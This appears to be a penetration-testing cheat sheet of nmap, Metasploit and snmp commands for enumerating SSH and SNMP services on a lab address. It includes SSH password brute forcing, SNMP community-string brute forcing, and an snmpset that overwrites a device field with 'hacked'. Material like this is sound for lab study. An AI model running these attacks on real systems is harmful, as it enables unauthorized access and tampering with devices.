nmap -v -n -Pn -p22 <IP Address>
nmap -v -n -Pn -p22 -sV <IP Address>
nmap -v -n -Pn -p22 -sC <IP Address>
nmap -v -n -Pn -p22 --script ssh2-enum-algos <IP Address>
locate .nse | grep ssh
/usr/share/nmap/scripts/ssh-auth-methods.nse
/usr/share/nmap/scripts/ssh-brute.nse
/usr/share/nmap/scripts/ssh-hostkey.nse
/usr/share/nmap/scripts/ssh-publickey-acceptance.nse
/usr/share/nmap/scripts/ssh-run.nse
/usr/share/nmap/scripts/ssh2-enum-algos.nse
/usr/share/nmap/scripts/sshv1.nse
nmap -v -n -Pn -p22 --script ssh-brute --script-args userdb=<username-list>,passdb=<password-file> <Target IP>
auxiliary/scanner/ssh/ssh_login
# Snmp Port Open or Not
sudo nmap -n -Pn -sU -p161 192.168.56.2
# Default Script Scan
sudo nmap -n -Pn -sU -p161 -sC 192.168.56.2
# Brute force community string
sudo nmap -n -Pn -sU -p161 --script snmp-brute 192.168.56.2 --script-args snmp-brute.communitiesDB=<dictionary location>
# Metasploit Module
auxiliary/scanner/snmp/snmp_enum
auxiliary/scanner/snmp/snmp_enumusers
auxiliary/scanner/snmp/snmp_login
/usr/share/nmap/scripts/snmp-brute.nse
/usr/share/nmap/scripts/snmp-hh3c-logins.nse
/usr/share/nmap/scripts/snmp-info.nse
/usr/share/nmap/scripts/snmp-interfaces.nse
/usr/share/nmap/scripts/snmp-ios-config.nse
/usr/share/nmap/scripts/snmp-netstat.nse
/usr/share/nmap/scripts/snmp-processes.nse
/usr/share/nmap/scripts/snmp-sysdescr.nse
/usr/share/nmap/scripts/snmp-win32-services.nse
/usr/share/nmap/scripts/snmp-win32-shares.nse
/usr/share/nmap/scripts/snmp-win32-software.nse
/usr/share/nmap/scripts/snmp-win32-users.nse
snmpwalk -v1 -c public 192.168.56.2
snmpset -v1 -c private 192.168.56.2 iso.3.6.1.2.1.1.1.0 s hacked
snmpget -v1 -c private 192.168.56.2 iso.3.6.1.2.1.1.1.0